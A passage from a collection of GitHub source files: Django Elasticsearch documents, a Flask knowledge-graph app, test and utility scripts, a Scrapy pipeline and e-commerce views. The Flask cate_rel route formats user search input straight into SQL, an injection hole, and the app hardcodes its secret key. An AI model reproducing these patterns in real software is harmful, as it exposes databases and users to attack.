but to improve performance we can select related in one sql request\"\"\"\n return super(LectureDocument, self).get_queryset().select_related(\n 'author'\n )\n\n def get_instances_from_related(self, related_instance):\n \"\"\"If related_models is set, define how to retrieve the Car instance(s) from the related model.\n The related_models option should be used with caution because it can lead in the index\n to the updating of a lot of items.\n \"\"\"\n if isinstance(related_instance, Author):\n return related_instance.lectures_author.all()\n elif isinstance(related_instance, Event):\n return related_instance.lectures.all()\n elif isinstance(related_instance, Category):\n return related_instance.lectures.all()\n\n\n@registry.register_document\nclass AuthorDocument(Document):\n name = fields.TextField(\n analyzer=eng_analyzer,\n )\n\n class Index:\n # Name of the Elasticsearch index\n name = 'authors'\n # See Elasticsearch Indices API reference for available settings\n settings = {'number_of_shards': 1,\n 'number_of_replicas': 0}\n\n class Django:\n model = Author # The model associated with this Document\n\n # The fields of the model you want to be indexed in Elasticsearch\n fields = [\n 'views',\n 'id',\n #'name',\n ]\n\n\n@registry.register_document\nclass CategoryDocument(Document):\n class Index:\n # Name of the Elasticsearch index\n name = 'categories'\n # See Elasticsearch Indices API reference for available settings\n settings = {'number_of_shards': 1,\n 'number_of_replicas': 0}\n\n class Django:\n model = Category # The model associated with this Document\n\n # The fields of the model you want to be indexed in Elasticsearch\n fields = [\n 'id',\n 'name',\n 'image',\n ]\n\n\n@registry.register_document\nclass EventDocument(Document):\n title = fields.TextField(\n analyzer=eng_analyzer,\n )\n description = fields.TextField(\n analyzer=eng_analyzer,\n )\n caption = fields.TextField(\n analyzer=eng_analyzer,\n )\n class Index:\n # Name of the Elasticsearch index\n name = 'events'\n # See Elasticsearch Indices API reference for available settings\n settings = {'number_of_shards': 1,\n 'number_of_replicas': 0}\n\n class Django:\n model = Event # The model associated with this Document\n\n # The fields of the model you want to be indexed in Elasticsearch\n fields = [\n 'id',\n #'title',\n #'description',\n #'caption',\n 'image',\n 'date'\n ]\n","repo_name":"gregpr07/VLN-Mobile","sub_path":"backend/esearch/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3167737684","text":"from flask import Flask, render_template, request, jsonify, make_response, redirect, session\nfrom neo_db.query_graph import query, get_KGQA_answer, get_answer_profile, query_path, get_answer_all_profile, \\\n query_branch, all, fuzzy_search\nfrom KGQA.ltp import get_target_array,get_fuzzy_array\nfrom neo_db.update import update_node, add_node, delete_node\nfrom kg_data.data_processing import get_data_num\nfrom kg_data.data_show import get_train_data_list\nfrom mysql_db.data_show import cate_rel_show, operation\nfrom flask_session import Session\nimport numpy as np\nimport pandas as pd\nimport csv\nimport os\nimport datetime\nimport json\n\napp = Flask(__name__)\n# app.config['SECRET_KEY'] = os.urandom(24)\napp.secret_key = 'beifang changjian de keke ....'\n\n\n# Session(app)\n\n@app.route('/', methods=['GET', 'POST'])\n# @app.route('/index', methods=['GET', 'POST'])\ndef 
first(name=None):\n return render_template('first.html', name=name)\n\n\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html')\n\n\n@app.route('/search.html', methods=['GET', 'POST'])\ndef search():\n return render_template('search.html')\n\n\n@app.route('/KGQA.html', methods=['GET', 'POST'])\ndef KGQA():\n return render_template('KGQA.html')\n\n\n@app.route('/get_profile', methods=['GET', 'POST'])\ndef get_profile():\n name = request.args.get('character_name')\n json_data = get_answer_profile(name)\n return jsonify(json_data)\n\n\n# all_relation.html所使用\n@app.route('/get_all_profile', methods=['GET', 'POST'])\ndef get_all_profile():\n name = request.args.get('character_name')\n # cate = request.args.get('cate')\n json_data = get_answer_all_profile(name)\n return jsonify(json_data)\n\n\n@app.route('/all_node', methods=['GET', 'POST'])\ndef all_node():\n json_data, name_dict = all()\n session['name_dict'] = name_dict\n return jsonify(json_data)\n\n\n@app.route('/search_a_node', methods=['GET', 'POST'])\ndef search_a_node():\n name = request.args.get('name')\n id = session.get('name_dict')[name]\n json_data = {'id': id}\n return jsonify(json_data)\n\n\n@app.route('/KGQA_answer', methods=['GET', 'POST'])\ndef KGQA_answer():\n question = request.args.get('name')\n target_array = get_target_array(str(question))\n if len(target_array) == 1:\n json_data = query(str(target_array[0]))\n elif len(target_array) == 0:\n json_data = query(question)\n else:\n json_data = get_KGQA_answer(target_array)\n return jsonify(json_data)\n\n\n@app.route('/KGQA_fuzzy', methods=['GET', 'POST'])\ndef KGQA_fuzzy():\n question = request.args.get('name')\n target_array = get_fuzzy_array(question)\n # print(f\"tar {target_array}\")\n json_data = fuzzy_search(target_array)\n # print(f\"js {json_data}\")\n return jsonify(json_data)\n\n\n# 知识点检索\n@app.route('/search_name', methods=['GET', 'POST'])\ndef search_name():\n name = request.args.get('name')\n json_data = query(str(name))\n return jsonify(json_data)\n\n\n# 多度查询,分支检索\n@app.route('/search_branch', methods=['GET', 'POST'])\ndef search_branch():\n name = request.args.get('name')\n print(name)\n deep = request.args.get('deep')\n print(deep)\n json_data = query_branch(str(name), deep)\n return jsonify(json_data)\n\n\n# 查询最短路径\n@app.route('/search_path', methods=['GET', 'POST'])\ndef search_path():\n a = request.args.get('a')\n b = request.args.get('b')\n json_data = query_path(str(a), str(b))\n return jsonify(json_data)\n\n\n## Neo4j数据库增删改查\n# 改变节点概念级别\n@app.route('/change_node', methods=['GET', 'POST'])\ndef change_node():\n node = request.args.get('node')\n cate = request.args.get('cate')\n update_node(node, cate)\n return render_template('all_relation.html')\n # json_data = update_node(str(node), str(cate))\n # return jsonify(json_data)\n\n\n# 添加一条关系\n@app.route('/add_Node', methods=['GET', 'POST'])\ndef add_Node():\n e1 = request.form.get('e1')\n e2 = request.form.get('e2')\n rel = request.form.get('rel')\n c1 = request.form.get('c1')\n c2 = request.form.get('c2')\n add_node(e1, e2, rel, c1, c2)\n # print(message)\n # print(e1)\n # response = make_response(jsonify({'status':'success'}))\n return redirect('/all_relation.html')\n\n\n# 删除一个节点\n@app.route('/delete_aNode', methods=['GET', 'POST'])\ndef delete_aNode():\n name = request.args.get('node')\n delete_node(name)\n return redirect('/all_relation.html')\n\n\n@app.route('/all_relation.html', methods=['GET', 'POST'])\ndef get_all_relation():\n return 
render_template('all_relation.html')\n\n\n# --------------------------part-------------------------------\n# --------------------------part-------------------------------\n@app.route('/graph.html', methods=['GET', 'POST'])\ndef graph():\n return render_template('part/graph.html')\n\n\n@app.route('/linear.html', methods=['GET', 'POST'])\ndef linear():\n return render_template('part/linear.html')\n\n\n@app.route('/stack.html', methods=['GET', 'POST'])\ndef stack():\n return render_template('part/stack.html')\n\n\n@app.route('/queue.html', methods=['GET', 'POST'])\ndef queue():\n return render_template('part/queue.html')\n\n\n@app.route('/string.html', methods=['GET', 'POST'])\ndef string():\n return render_template('part/string.html')\n\n\n@app.route('/array.html', methods=['GET', 'POST'])\ndef array():\n return render_template('part/array.html')\n\n\n@app.route('/lists.html', methods=['GET', 'POST'])\ndef lists():\n return render_template('part/lists.html')\n\n\n@app.route('/tree.html', methods=['GET', 'POST'])\ndef tree():\n return render_template('part/tree.html')\n\n\n@app.route('/searching.html', methods=['GET', 'POST'])\ndef searching():\n return render_template('part/searching.html')\n\n\n@app.route('/sorting.html', methods=['GET', 'POST'])\ndef sorting():\n return render_template('part/sorting.html')\n\n\n# -------------------------other------------------------------\n# -------------------------other------------------------------\n@app.route('/search_path.html', methods=['GET', 'POST'])\ndef search_path1():\n return render_template('search_path.html')\n\n\n# -------------------------data_show------------------------------\n# -------------------------data_show------------------------------\n@app.route('/cate_rel', methods=['GET', 'POST'])\ndef cate_rel():\n \"\"\"请求的数据源,该函数将数据库中存储的数据,返回以下这种数据的列表:\n {'name': '香蕉', 'id': 1, 'price': '10'}\n {'name': '苹果', 'id': 2, 'price': '10'}\n \"\"\"\n # data = cate_rel_show()\n\n # if request.method == 'POST':\n # print('post')\n # if request.method == 'GET':\n # info = request.values\n # limit = info.get('limit', 10) # 每页显示的条数\n # offset = info.get('offset', 0) # 分片数,(页码-1)*limit,它表示一段数据的起点\n # print('get', limit)\n # print('get offset', offset)\n\n name = request.args.get('search_kw')\n if name:\n print(name)\n sql = \"select * from cate_rel where e1 like '%{0}%' or e2 like '%{0}%' or rel like '%{0}%' or c1 like '%{0}%' or c2 like '%{0}%'\".format(\n name)\n else:\n sql = 'SELECT * FROM cate_rel'\n data = cate_rel_show(sql)\n return jsonify(data)\n # return jsonify({'total': len(data), 'rows': data[int(offset):(int(offset) + int(limit))]})\n # 注意total与rows是必须的两个参数,名字不能写错,total是数据的总长度,rows是每页要显示的数据,它是一个列表\n # 前端根本不需要指定total和rows这俩参数,他们已经封装在了bootstrap table里了\n\n\n# 添加一条记录\n@app.route('/add_item', methods=['GET', 'POST'])\ndef add_item():\n e1 = request.form.get('e1')\n e2 = request.form.get('e2')\n rel = request.form.get('rel')\n c1 = request.form.get('c1')\n c2 = request.form.get('c2')\n item = [e1, e2, rel, c1, c2]\n sql = 'insert cate_rel (e1, e2, rel, c1, c2)VALUES (%s, %s, %s, %s, %s)'\n operation(sql, item)\n print(e1)\n # response = make_response(jsonify({'status':'success'}))\n return redirect('/data_show.html')\n\n\n# 更新一条记录\n@app.route('/update_item', methods=['GET', 'POST'])\ndef update_item():\n cate_rel_id = request.form.get('cate_rel_id')\n e1 = request.form.get('update_e1')\n e2 = request.form.get('update_e2')\n rel = request.form.get('update_rel')\n c1 = request.form.get('update_c1')\n c2 = request.form.get('update_c2')\n item = 
[e1, e2, rel, c1, c2, cate_rel_id]\n # print(item)\n sql = 'update cate_rel set e1 = %s, e2 = %s, rel = %s, c1 = %s, c2 = %s where cate_rel_id = %s'\n\n operation(sql, item)\n print(e1)\n # response = make_response(jsonify({'status':'success'}))\n return redirect('/data_show.html')\n\n\n# 删除一条记录\n@app.route('/delete_item', methods=['GET', 'POST'])\ndef delete_item():\n cate_rel_id = request.args.get(\"id\")\n cate_rel_id = int(cate_rel_id)\n print(cate_rel_id)\n item = [cate_rel_id]\n sql = 'delete from cate_rel where cate_rel_id = \"%s\"'\n operation(sql, item)\n return redirect('/data_show.html')\n\n\n@app.route('/data_show.html', methods=['GET', 'POST'])\ndef data_show():\n # train_data_list = get_train_data_list('/kg_data/cate.csv')\n return render_template('data_show/data_show.html')\n\n\n@app.route('/cate.html', methods=['GET', 'POST'])\ndef cate():\n train_data_list = get_train_data_list('/kg_data/cate.csv')\n return render_template('data_show/cate.html', train_data_list=train_data_list)\n\n\n@app.route('/relation.html', methods=['GET', 'POST'])\ndef relation():\n train_data_list = get_train_data_list('/kg_data/relation.csv')\n return render_template('data_show/relation.html', train_data_list=train_data_list)\n\n\n@app.route('/welcome.html', methods=['GET', 'POST'])\ndef welcome():\n relation, entity = get_data_num()\n return render_template('welcome.html', entity=entity, relation=relation)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","repo_name":"MayukeM/DataStructure_KG","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9991,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"66"} +{"seq_id":"22224337905","text":"import matplotlib.pyplot as plt\nimport sys\n\nx = []\ny = []\n\nfor line in sys.stdin:\n x.append(int(line.split(\",\")[0]))\n y.append(float(line.split(\",\")[1]))\n\nplt.plot(x,y)\nplt.xlabel('Message number')\nplt.ylabel('Response time in ms')\nplt.title(\"Response Time Analysis\")\nplt.show()","repo_name":"mayankmetha/sockets","sub_path":"analysis/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36265866209","text":"import unittest\n\nfrom absl.testing import absltest\nimport numpy as np\nfrom putting_dune import constants\nfrom putting_dune import geometry\nfrom putting_dune import goals\nfrom putting_dune import graphene\nfrom putting_dune import microscope_utils\nfrom putting_dune import simulator\n\n\nclass SingleSiliconGoalReachingTest(absltest.TestCase):\n\n def setUp(self):\n super().setUp()\n self.rng = np.random.default_rng(0)\n self.goal = goals.SingleSiliconGoalReaching()\n # Make a small graphene sheet to more thoroughly test what happens\n # at the edge of a graphene sheet.\n self.material = graphene.PristineSingleDopedGraphene(grid_columns=50)\n self.sim = simulator.PuttingDuneSimulator(self.material)\n\n def test_goal_position_is_set_to_a_lattice_position(self):\n # Reset several times to check it's always a lattice position.\n for _ in range(10):\n obs = self.sim.reset(self.rng)\n self.goal.reset(self.rng, obs)\n\n # We don't need all 3 nearest neighbors, but this function\n # is convenient to use.\n neighbor_distances = geometry.nearest_neighbors3(\n self.material.grid.atom_positions,\n self.goal.goal_position_material_frame,\n include_self=True,\n ).neighbor_distances\n self.assertLess(neighbor_distances[0], 1e-3)\n\n def 
test_goal_position_is_not_set_near_an_edge(self):\n # This is enforced implicitly - the goal is an atom position within\n # the field of view, and the simulator initiates the silicon close to\n # the center of the simulated material.\n\n # Reset several times to check it's not near an edge.\n for _ in range(100):\n obs = self.sim.reset(self.rng)\n self.goal.reset(self.rng, obs)\n\n # We look at the neighbor distances in the material frame.\n neighbor_distances = geometry.nearest_neighbors3(\n self.material.grid.atom_positions,\n self.goal.goal_position_material_frame,\n ).neighbor_distances\n self.assertLessEqual(\n neighbor_distances[-1],\n constants.CARBON_BOND_DISTANCE_ANGSTROMS + 1e-3,\n )\n\n @unittest.skip('The reward is now sparse. If we switch back, un-skip this.')\n def test_reward_increases_when_silicon_is_nearer_goal(self):\n obs = self.sim.reset(self.rng)\n self.goal.reset(self.rng, obs)\n\n # Normally goals should be on the grid, but we can fake it for this test.\n silicon_position = self.material.get_silicon_position()\n closer_goal = silicon_position + np.asarray([5.0, 5.0], dtype=np.float32)\n further_goal = silicon_position + np.asarray([-8.0, 5.0], dtype=np.float32)\n\n self.goal.goal_position_material_frame = closer_goal\n closer_result = self.goal.calculate_reward_and_terminal(obs)\n self.goal.goal_position_material_frame = further_goal\n further_result = self.goal.calculate_reward_and_terminal(obs)\n\n self.assertGreater(closer_result.reward, further_result.reward)\n\n def test_returns_terminal_when_silicon_is_at_goal(self):\n obs = self.sim.reset(self.rng)\n self.goal.reset(self.rng, obs)\n\n # Make an observation with the silicon at the goal position.\n silicon_position = graphene.get_silicon_positions(obs.grid)\n self.assertEqual(silicon_position.shape, (1, 2))\n obs = microscope_utils.MicroscopeObservation(\n # Put the silicon right in the center of the fov for convenience.\n grid=microscope_utils.AtomicGridMicroscopeFrame(\n microscope_utils.AtomicGrid(\n atom_positions=obs.grid.atom_positions - silicon_position + 0.5,\n atomic_numbers=obs.grid.atomic_numbers,\n )\n ),\n fov=microscope_utils.MicroscopeFieldOfView(\n lower_left=geometry.PointMaterialFrame(\n geometry.Point(self.goal.goal_position_material_frame - 10.0)\n ),\n upper_right=geometry.PointMaterialFrame(\n geometry.Point(self.goal.goal_position_material_frame + 10.0)\n ),\n ),\n controls=obs.controls,\n elapsed_time=obs.elapsed_time,\n )\n\n result = self.goal.calculate_reward_and_terminal(obs)\n\n self.assertTrue(result.is_terminal)\n\n def test_no_goals_within_1_angstrom(self):\n obs = self.sim.reset(self.rng)\n self.goal.goal_range_angstroms = (0.1, 1.0)\n\n with self.assertRaises(RuntimeError):\n self.goal.reset(self.rng, obs)\n\n def test_three_possible_goals_one_step_away(self):\n obs = self.sim.reset(self.rng)\n # 1.42 = 1 bond distance.\n self.goal.goal_range_angstroms = (1.40, 1.44)\n\n # Select a goal many times. 
We should see each goal at least once.\n observed_goal_positions = set()\n for _ in range(30):\n self.goal.reset(self.rng, obs)\n goal_position = self.goal.goal_position_material_frame.copy()\n observed_goal_positions.add(\n (round(goal_position[0], 5), round(goal_position[1], 5))\n )\n\n self.assertLen(observed_goal_positions, 3)\n\n def test_goal_reset_raises_error_if_no_silicon_is_found(self):\n obs = self.sim.reset(self.rng)\n obs.grid.atomic_numbers[:] = constants.CARBON\n\n with self.assertRaises(graphene.SiliconNotFoundError):\n self.goal.reset(self.rng, obs)\n\n def test_goal_calculate_raises_error_if_no_silicon_is_found(self):\n obs = self.sim.reset(self.rng)\n self.goal.reset(self.rng, obs)\n\n obs.grid.atomic_numbers[:] = constants.CARBON\n\n with self.assertRaises(graphene.SiliconNotFoundError):\n self.goal.calculate_reward_and_terminal(obs)\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"google/putting-dune","sub_path":"putting_dune/goals_test.py","file_name":"goals_test.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18764414169","text":"\"\"\"\nhttps://adventofcode.com/2020/day/10\n\"\"\"\n\n# Read input\nf = 'day-10/input.txt'\nwith open(f) as fp:\n adapters = [0] + sorted([int(x) for x in fp.read().split(\"\\n\")])\n\n# difference in joltage for paired adapters\ndeltas = [x-y for x, y in zip(adapters[1:], adapters[:-1])]\n\n# Problem 1: What is the number of 1-jolt differences multiplied by the number\n# of 3-jolt differences? Note that your device's built-in adapter has a joltage\n# 3 jolts higher than the highest-rated adapter.\nanswer = deltas.count(1) * (deltas.count(3)+1)\nprint(f'problem 1: {answer}')\n\n# Problem 2: What is the total number of distinct ways you can arrange the\n# adapters to connect the charging outlet to your device?\nadapters.remove(0)\nna = len(adapters)\npaths = [0 if x > 3 else 1 for x in adapters]\n\n# Compute the numbers of `paths` or unique adapter configurations which can\n# produce a given output joltage.\nfor i in range(na):\n j = i+1\n while (j < (na-1)) and ((adapters[j]-adapters[i]) <= 3):\n paths[j] += paths[i]\n j += 1\n\nprint(f'problem 2: {paths[-2]}')\n","repo_name":"jbburt/advent-of-code-20","sub_path":"day-10/day_10.py","file_name":"day_10.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2419992856","text":"import sqlite3\nfrom .items import RestaurantItem, RestaurantInfoItem, RestaurantReviewItem\n\nclass TripadvisorPipeline(object):\n def __init__(self):\n self.create_connection()\n self.create_table()\n\n def create_connection(self):\n self.conn = sqlite3.connect(\"tripadvisor_restaurants.db\")\n self.curr = self.conn.cursor()\n\n def create_table(self):\n self.curr.execute(\"\"\"DROP TABLE IF EXISTS restaurant_table\"\"\")\n self.curr.execute(\"\"\"DROP TABLE IF EXISTS restaurant_info_table\"\"\")\n self.curr.execute(\"\"\"DROP TABLE IF EXISTS restaurant_review_table\"\"\")\n self.curr.execute(\"\"\"create table restaurant_table(\n id text,\n name text,\n restaurant_type text,\n restaurant_price text,\n restaurantid_fk text,\n page text\n )\"\"\")\n self.curr.execute(\"\"\"create table restaurant_info_table(\n id text,\n link text,\n coordinate text,\n image_url text,\n address text,\n phone_number text,\n review_count text,\n rate text,\n rate_food text,\n rate_service text,\n rate_atmosphere 
text,\n rate_value text,\n price_range text,\n cuisines text,\n meals text,\n special_diets text\n )\"\"\")\n self.curr.execute(\"\"\"create table restaurant_review_table(\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n name text,\n country text,\n rate text,\n date text,\n title text,\n content text,\n restaurantreview_fk text\n )\"\"\")\n\n def process_item(self, item, spider):\n if isinstance(item, RestaurantItem):\n self.store_restaurant(item)\n if isinstance(item, RestaurantInfoItem):\n self.store_restaurant_info(item)\n if isinstance(item, RestaurantReviewItem):\n self.store_restaurant_review(item)\n return item\n\n def store_restaurant(self, item):\n self.curr.execute(\"\"\"insert into restaurant_table values (?,?,?,?,?,?)\"\"\",(\n item['id'],\n item['name'],\n item['restaurant_type'],\n item['restaurant_price'],\n item['restaurantid_fk'],\n item['page']\n ))\n self.conn.commit()\n\n def store_restaurant_info(self, item):\n self.curr.execute(\"\"\"insert into restaurant_info_table values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)\"\"\",(\n item['id'],\n item['link'],\n item['coordinate'],\n item['image_url'],\n item['address'],\n item['phone_number'],\n item['review_count'],\n item['rate'],\n item['rate_food'],\n item['rate_service'],\n item['rate_atmosphere'],\n item['rate_value'],\n item['price_range'],\n item['cuisines'],\n item['meals'],\n item['special_diets']\n ))\n self.conn.commit()\n\n def store_restaurant_review(self, item):\n self.curr.execute(\"\"\"insert into restaurant_review_table values (?,?,?,?,?,?,?,?)\"\"\",(\n None,\n item['name'],\n item['country'],\n item['rate'],\n item['date'],\n item['title'],\n item['content'],\n item['restaurantreview_fk'],\n ))\n self.conn.commit()\n","repo_name":"tsadigov/tripadvisor_crawler","sub_path":"tripadvisor/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9012911247","text":"from django.shortcuts import render,redirect\nfrom django.views import View\nfrom django.contrib.auth.models import User\nfrom .models import Customer, Product, NewCollection, DiscountProduct, Cart, OrderPlaced,Review,Wishlist\nfrom .forms import SignUpForm,CustomerProfileForm,PasswordChangeForm\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.decorators.http import require_http_methods\nfrom django.db.models import Count\nfrom django.urls import reverse\nfrom .forms import ReviewForm\nfrom django.utils import timezone\nimport json\nfrom django.http import HttpResponseRedirect\nfrom django.core.exceptions import ObjectDoesNotExist\nimport requests\nfrom sslcommerz_python.payment import SSLCSession\n\nfrom decimal import Decimal\nimport socket\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\nfrom django.conf import settings\n#def home(request):\n# return render(request, 'app/home.html')\n\nclass ProductView(View):\n def get(self,request):\n totalitem=0\n products = Product.objects.all()\n Mobile = Product.objects.filter(category='M')\n Laptop = Product.objects.filter(category='L')\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n context = {'products': 
products,'Mobile': Mobile,'Laptop': Laptop,'totalitem':totalitem}\n return render(request, 'app/home.html', context)\nclass MainProductView(View):\n def get(self,request):\n Mobile = Product.objects.filter(category='M')\n Laptop = Product.objects.filter(category='L')\n Camera = Product.objects.filter(category='C')\n Keyboards = Product.objects.filter(category='K')\n Mouse = Product.objects.filter(category='Mo')\n Desktops = Product.objects.filter(category='D')\n Pendrive = Product.objects.filter(category='P')\n\n context = {\n 'Mobile': Mobile,\n 'Laptop': Laptop,\n 'Camera': Camera,\n 'Keyboards': Keyboards,\n 'Mouse': Mouse,\n 'Desktops': Desktops,\n 'Pendrive': Pendrive,\n }\n \n return render(request, 'app/home.html', context)\n\n#def product_detail(request):\n# return render(request, 'app/productdetail.html')\n\nclass ProductDetailView(View):\n def get(self,request,pk):\n totalitem=0\n products = Product.objects.get(pk=pk)\n reviews = Review.objects.filter(product=products).order_by('-created_at')\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/productdetail.html', {'products':products, 'reviews':reviews,'totalitem':totalitem})\nclass MainProductDetailView(View):\n def get(self,request,pk):\n products = Product.objects.get(pk=pk)\n return render(request, 'app/productdetail.html', {'products':products})\n@login_required\ndef add_to_cart(request):\n user = request.user\n product_id = request.GET.get('prod_id')\n product = Product.objects.get(id=product_id) # retrieve the Product instance\n if Cart.objects.filter(user=user, product=product).exists():\n messages.info(request, 'Product is already in your cart.')\n else:\n Cart(user=user, product=product).save()\n Wishlist.objects.filter(user=user, product=product).delete()\n return redirect( '/cart')\n \n@login_required\ndef show_cart(request):\n totalitem=0\n if request.user.is_authenticated:\n user=request.user\n cart=Cart.objects.filter(user=user)\n print(cart)\n amount=0.0\n shipping_amount=100.0\n total=0.0\n cart_product=[p for p in Cart.objects.all() if p.user ==user]\n print(cart_product)\n totalitem=len(Cart.objects.filter(user=request.user))\n if cart_product:\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount += tempamount\n total = amount + shipping_amount\n\n return render(request, 'app/addtocart.html', {'carts': cart, 'total': total, 'amount': amount,'totalitem':totalitem})\n\n else:\n return render(request, 'app/emptycart.html')\ndef plus_cart(request):\n if request.method =='GET':\n \n prod_id=request.GET['prod_id']\n print(prod_id)\n c=Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n c.quantity+=1\n c.save()\n amount=0.0\n shipping_amount=100.0\n total=0.0\n cart_product=[p for p in Cart.objects.all() if p.user ==request.user]\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount +=tempamount\n total=amount+shipping_amount\n data={\n 'quantity':c.quantity,\n 'amount':amount,\n 'total':total\n }\n return JsonResponse(data)\ndef minus_cart(request):\n if request.method =='GET':\n prod_id = request.GET['prod_id']\n print(prod_id)\n c = Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n if c.quantity > 1: # Check if quantity is greater than 1\n c.quantity -= 1\n 
c.save()\n disable_minus_button = False # Enable minus button after decrement\n else:\n disable_minus_button = True # Disable minus button when quantity is 1\n amount = 0.0\n shipping_amount = 100.0\n total = 0.0\n cart_product = [p for p in Cart.objects.all() if p.user == request.user]\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount += tempamount\n \n if c.quantity == 0:\n shipping_amount = 0.0\n\n total = amount + shipping_amount\n data = {\n 'quantity': c.quantity,\n 'amount': amount,\n 'total': total,\n 'disable_minus_button': disable_minus_button\n }\n return JsonResponse(data)\n\n\ndef remove_cart(request):\n if request.method =='GET':\n \n prod_id=request.GET['prod_id']\n print(prod_id)\n c=Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n \n c.delete()\n amount=0.0\n shipping_amount=100.0\n total=0.0\n cart_product=[p for p in Cart.objects.all() if p.user ==request.user]\n for p in cart_product:\n if p.product.discounted_price == 0:\n tempamount = p.quantity * p.product.selling_price\n else:\n tempamount = p.quantity * p.product.discounted_price\n amount += tempamount\n total = amount + shipping_amount\n data={\n \n 'amount':amount,\n 'total':total\n }\n return JsonResponse(data)\n\n\ndef buy_now(request):\n return render(request, 'app/buynow.html')\n\n#def profile(request):\n# return render(request, 'app/profile.html')\n@login_required\ndef address(request):\n totalitem=0\n add=Customer.objects.filter(user=request.user)\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/address.html',{'add':add,'active':'btn-primary','totalitem':totalitem})\n@login_required\ndef orders(request):\n totalitem=0\n op=OrderPlaced.objects.filter(user=request.user)\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n\n return render(request, 'app/orders.html',{'order_placed':op,'totalitem':totalitem})\n\n\ndef mobile(request, data=None):\n totalitem=0\n mobile = None\n \n if data is None:\n mobile = Product.objects.filter(category='M')\n elif data == 'below': \n mobile = Product.objects.filter(category='M', selling_price__lt=20000)\n elif data == 'above': \n mobile = Product.objects.filter(category='M', selling_price__gte=20000)\n else:\n mobile = Product.objects.filter(category='M', brand=data)\n \n paginator = Paginator(mobile, 8)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n # Retrieve unique brand names from the Product model\n brands = Product.objects.filter(category='M').values('brand').annotate(num_products=Count('id')).order_by('-num_products')\n\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/mobile.html', {\n 'page_obj': page_obj,\n 'brands': brands,'totalitem':totalitem\n })\n\n\ndef laptop(request, data=None):\n totalitem=0\n laptop = None\n \n if data is None:\n laptop = Product.objects.filter(category='L')\n elif data == 'below': \n laptop = Product.objects.filter(category='L', selling_price__lt=70000)\n elif data == 'above': \n laptop = Product.objects.filter(category='L', selling_price__gte=70000)\n else:\n laptop = Product.objects.filter(category='L', brand=data)\n \n paginator = Paginator(laptop, 8)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n # Retrieve unique brand 
names from the Product model\n brands = Product.objects.filter(category='L').values('brand').annotate(num_products=Count('id')).order_by('-num_products')\n\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/laptop.html', {\n 'page_obj': page_obj,\n 'brands': brands,'totalitem':totalitem\n })\n\n\n\ndef camera(request, data=None):\n totalitem=0\n camera = None\n \n if data is None:\n camera = Product.objects.filter(category='C')\n elif data == 'below': \n camera = Product.objects.filter(category='C', selling_price__lt=30000)\n elif data == 'above': \n camera = Product.objects.filter(category='C', selling_price__gte=30000)\n else:\n camera = Product.objects.filter(category='C', brand=data)\n \n paginator = Paginator(camera, 8)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n # Retrieve unique brand names from the Product model\n brands = Product.objects.filter(category='C').values('brand').annotate(num_products=Count('id')).order_by('-num_products')\n\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/camera.html', {\n 'page_obj': page_obj,\n 'brands': brands,'totalitem':totalitem\n })\n\ndef grocery(request, data=None):\n totalitem=0\n grocery = None\n \n if data is None:\n grocery = Product.objects.filter(category='G')\n elif data == 'below': \n grocery = Product.objects.filter(category='G', selling_price__lt=2000)\n elif data == 'above': \n grocery = Product.objects.filter(category='G', selling_price__gte=2000)\n else:\n grocery = Product.objects.filter(category='G', brand=data)\n \n paginator = Paginator(grocery, 8)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n # Retrieve unique brand names from the Product model\n brands = Product.objects.filter(category='G').values('brand').annotate(num_products=Count('id')).order_by('-num_products')\n\n if request.user.is_authenticated:\n totalitem=len(Cart.objects.filter(user=request.user))\n return render(request, 'app/grocery.html', {\n 'page_obj': page_obj,\n 'brands': 